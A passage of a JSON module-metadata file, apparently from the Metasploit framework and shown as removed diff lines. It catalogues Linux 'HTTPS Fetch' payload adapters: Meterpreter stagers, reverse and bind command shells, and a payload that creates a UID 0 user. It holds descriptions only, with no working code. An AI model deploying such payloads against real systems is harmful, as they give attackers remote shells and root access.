"check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/https/x64/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/x64/pingback_bind_tcp": { - "name": "HTTPS Fetch, Linux x64 Pingback, Bind TCP Inline", - "fullname": "payload/cmd/linux/https/x64/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nAccept a connection from attacker and report UUID (Linux x64)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": 
"/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/pingback_bind_tcp", - "staged": false - }, - "payload_cmd/linux/https/x64/pingback_reverse_tcp": { - "name": "HTTPS Fetch, Linux x64 Pingback, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and report UUID (Linux x64)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/x64/shell/bind_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Stager", - "fullname": "payload/cmd/linux/https/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - 
"rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/shell/bind_tcp", - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/bind_tcp" - }, - "payload_cmd/linux/https/x64/shell/reverse_sctp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse SCTP Stager", - "fullname": "payload/cmd/linux/https/x64/shell/reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky", - "RageLtMan " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/shell/reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/shell/reverse_sctp", - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/reverse_sctp" - }, - "payload_cmd/linux/https/x64/shell/reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/x64/shell/reverse_tcp", - 
"aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky", - "tkmru" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/reverse_tcp" - }, - "payload_cmd/linux/https/x64/shell_bind_ipv6_tcp": { - "name": "HTTPS Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/https/x64/shell_bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "epi " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/shell_bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - 
"adapted_refname": "linux/x64/shell_bind_ipv6_tcp", - "staged": false - }, - "payload_cmd/linux/https/x64/shell_bind_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/https/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/https/x64/shell_bind_tcp_random_port": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Random Port Inline", - "fullname": "payload/cmd/linux/https/x64/shell_bind_tcp_random_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Geyslan G. 
Bem " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/shell_bind_tcp_random_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/shell_bind_tcp_random_port", - "staged": false - }, - "payload_cmd/linux/https/x64/shell_find_port": { - "name": "HTTPS Fetch, Linux Command Shell, Find Port Inline", - "fullname": "payload/cmd/linux/https/x64/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "mak" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/shell_find_port", - "staged": 
false - }, - "payload_cmd/linux/https/x64/shell_reverse_ipv6_tcp": { - "name": "HTTPS Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/https/x64/shell_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "epi " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell over IPv6", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/shell_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/shell_reverse_ipv6_tcp", - "staged": false - }, - "payload_cmd/linux/https/x64/shell_reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": 
false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x64", - "adapted_refname": "linux/x64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/x86/adduser": { - "name": "HTTPS Fetch, Linux Add User", - "fullname": "payload/cmd/linux/https/x86/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "vlad902 ", - "spoonm " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nCreate a new user with UID 0", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/adduser", - "staged": false - }, - "payload_cmd/linux/https/x86/chmod": { - "name": "HTTPS Fetch, Linux Chmod", - "fullname": "payload/cmd/linux/https/x86/chmod", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "kris katterjohn " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nRuns chmod on specified file with specified mode", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/chmod", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/chmod", - "staged": false - }, - "payload_cmd/linux/https/x86/exec": { - "name": "HTTPS Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/https/x86/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "vlad902 ", - "Geyslan G. Bem " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nExecute an arbitrary command or just a /bin/sh shell", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm", - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/exec", - "staged": false - }, - "payload_cmd/linux/https/x86/generic/debug_trap": { - "name": "HTTPS Fetch, Generic x86 Debug Trap", - "fullname": "payload/cmd/linux/https/x86/generic/debug_trap", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "robert " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nGenerate a debug trap in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "cmd", - "rport": null, - 
"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/generic/debug_trap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "generic/debug_trap", - "staged": false - }, - "payload_cmd/linux/https/x86/generic/tight_loop": { - "name": "HTTPS Fetch, Generic x86 Tight Loop", - "fullname": "payload/cmd/linux/https/x86/generic/tight_loop", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "jduck " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nGenerate a tight loop in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/generic/tight_loop", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "generic/tight_loop", - "staged": false - }, - "payload_cmd/linux/https/x86/meterpreter/bind_ipv6_tcp": { - "name": "HTTPS Fetch, Bind IPv6 TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "kris katterjohn ", - "egypt " - 
], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for an IPv6 connection (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_ipv6_tcp" - }, - "payload_cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid": { - "name": "HTTPS Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "kris katterjohn ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - 
"adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" - }, - "payload_cmd/linux/https/x86/meterpreter/bind_nonx_tcp": { - "name": "HTTPS Fetch, Bind TCP Stager", - "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/bind_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_nonx_tcp" - }, - "payload_cmd/linux/https/x86/meterpreter/bind_tcp": { - "name": "HTTPS Fetch, Bind TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - 
"mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_tcp" - }, - "payload_cmd/linux/https/x86/meterpreter/bind_tcp_uuid": { - "name": "HTTPS Fetch, Bind TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_tcp_uuid" - }, - "payload_cmd/linux/https/x86/meterpreter/find_tag": { - "name": "HTTPS Fetch, Find Tag Stager", - "fullname": "payload/cmd/linux/https/x86/meterpreter/find_tag", - "aliases": 
[], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nUse an established connection", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/find_tag", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/find_tag" - }, - "payload_cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp": { - "name": "HTTPS Fetch, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "kris katterjohn " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to attacker over IPv6", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - 
"adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_ipv6_tcp" - }, - "payload_cmd/linux/https/x86/meterpreter/reverse_nonx_tcp": { - "name": "HTTPS Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/x86/meterpreter/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_nonx_tcp" - }, - "payload_cmd/linux/https/x86/meterpreter/reverse_tcp": { - "name": "HTTPS Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/x86/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt ", - "tkmru" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - 
"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_tcp" - }, - "payload_cmd/linux/https/x86/meterpreter/reverse_tcp_uuid": { - "name": "HTTPS Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/x86/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_tcp_uuid" - }, - "payload_cmd/linux/https/x86/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": 
